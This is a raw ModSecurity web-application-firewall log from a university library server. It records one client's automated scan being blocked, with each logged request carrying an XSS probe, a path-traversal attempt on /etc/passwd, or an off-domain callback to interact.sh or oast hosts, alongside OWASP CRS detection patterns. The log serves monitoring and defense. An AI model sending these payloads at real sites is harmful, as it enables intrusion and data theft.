[Tue Aug 29 11:53:45.564271 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAoW7UEAAAAJ"]
[Tue Aug 29 11:53:45.672037 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAn409UAAAAW"]
[Tue Aug 29 11:53:46.701720 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO152sCo-f0AAAofm@MAAAAX"]
[Tue Aug 29 11:53:47.769457 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO1528Co-f0AAAo2m7AAAAAA"]
[Tue Aug 29 11:53:50.869374 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAolKawAAAAe"]
[Tue Aug 29 11:53:51.736804 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAAox7LUAAAAN"]
[Tue Aug 29 11:53:52.807351 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAAolKbAAAAAe"]
[Tue Aug 29 11:53:52.851529 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154MCo-f0AAAoPue0AAAAM"]
[Tue Aug 29 11:53:52.981281 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154MCo-f0AAAoW7VoAAAAJ"]
[Tue Aug 29 11:53:53.586750 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAApLWkwAAAAI"]
[Tue Aug 29 11:53:54.558881 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAoW7WAAAAAJ"]
[Tue Aug 29 11:53:55.679521 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoAk2YAAAAC"]
[Tue Aug 29 11:53:56.588443 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO155MCo-f0AAAoUJewAAAAB"]
[Tue Aug 29 11:53:56.631750 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAoLfYAAAAAG"]
[Tue Aug 29 11:53:57.578276 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/Login"] [unique_id "ZO155cCo-f0AAAoqbYEAAAAj"]
[Tue Aug 29 11:54:00.545229 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAAoZ6V0AAAAK"]
[Tue Aug 29 11:54:00.600828 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAowNuEAAAAH"]
[Tue Aug 29 11:54:00.612767 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAAo2m8wAAAAA"]
[Tue Aug 29 11:54:00.746881 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAAowNuUAAAAH"]
[Tue Aug 29 11:54:01.809091 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAApQ2WQAAAAb"]
[Tue Aug 29 11:54:02.652807 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAolKdEAAAAe"]
[Tue Aug 29 11:54:04.700260 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAApQ2XMAAAAb"]
[Tue Aug 29 11:54:04.910915 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAo2m@cAAAAA"]
[Tue Aug 29 11:54:07.889896 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO1578Co-f0AAApQ2YIAAAAb"]
[Tue Aug 29 11:54:08.667178 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAAox7PoAAAAN"]
[Tue Aug 29 11:54:09.977064 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAAoZ6YwAAAAK"]
[Tue Aug 29 11:54:11.172501 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1588Co-f0AAApWY1IAAAAM"]
[Tue Aug 29 11:54:11.660209 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAApWY1YAAAAM"]
[Tue Aug 29 11:54:12.736500 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ypa9tdwi36cf1.oast.site found within TX:1: cjmnijtjmimvgniikdb0ypa9tdwi36cf1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApgAxgAAAAH"]
